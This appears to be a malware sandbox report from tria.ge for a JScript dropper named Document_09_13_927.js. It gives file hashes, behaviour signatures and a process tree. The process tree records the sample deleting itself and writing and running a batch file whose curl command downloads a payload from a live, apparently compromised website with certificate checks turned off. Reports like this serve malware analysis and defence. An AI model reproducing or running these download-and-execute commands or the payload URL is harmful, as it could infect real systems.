Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
14/10/2023, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
Document_09_13_927.js
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
Document_09_13_927.js
Resource
win10v2004-20230915-en
General
-
Target
Document_09_13_927.js
-
Size
43KB
-
MD5
03677c4079fafd6413c5552f3d6da926
-
SHA1
28f14a816b7fb22630c7d59af9d404f51dab4f69
-
SHA256
32ee3a4074bff70f212b88233f37f72796982c3e579fcdcc7c773ae5c41ae010
-
SHA512
debf24ab43ea09c567afe47e5289fad62fb19e7d8d1d6401e466feec1f1da84e3652e06854750e0911cdeead48b7a86bfeb74e440ca43bbda9588162da9875fc
-
SSDEEP
384:eo/1qDp3h548/pzFhb2uhK2U2yoWmfrL4tuEsSRqQ1SDIJnjOsetOI88s8vr6z1d:/qHLi+lIR6J2kzqpaJfs9
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 2600 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2200 wrote to memory of 2600 2200 wscript.exe 29 PID 2200 wrote to memory of 2600 2200 wscript.exe 29 PID 2200 wrote to memory of 2600 2200 wscript.exe 29 PID 2200 wrote to memory of 2132 2200 wscript.exe 30 PID 2200 wrote to memory of 2132 2200 wscript.exe 30 PID 2200 wrote to memory of 2132 2200 wscript.exe 30 PID 2200 wrote to memory of 2728 2200 wscript.exe 33 PID 2200 wrote to memory of 2728 2200 wscript.exe 33 PID 2200 wrote to memory of 2728 2200 wscript.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Document_09_13_927.js1⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Document_09_13_927.js"2⤵
- Deletes itself
PID:2600
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo curl https://shankarmallapur.com/wp-content/ewww/image-backup/uploads/2019/11/6603.7z --output "C:\Users\Admin\AppData\Local\Temp\voluptatem.p" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"2⤵PID:2132
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"2⤵PID:2728
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
184B
MD569d466581b9f52f28ca830ea196000d1
SHA1e28316b3d54e97322014e898b4025139286c014c
SHA2564d0fa867e22ced070e431af28666e0e2caaa1822b61f0424610a903e73f87118
SHA512b8cdbcafb5e8b2b12fd2bb3041ca4bbd2f533b1069911cea355e647044ee3cd795671fba486f44125835d60a93876485d6784db31eb080707daeac105922844e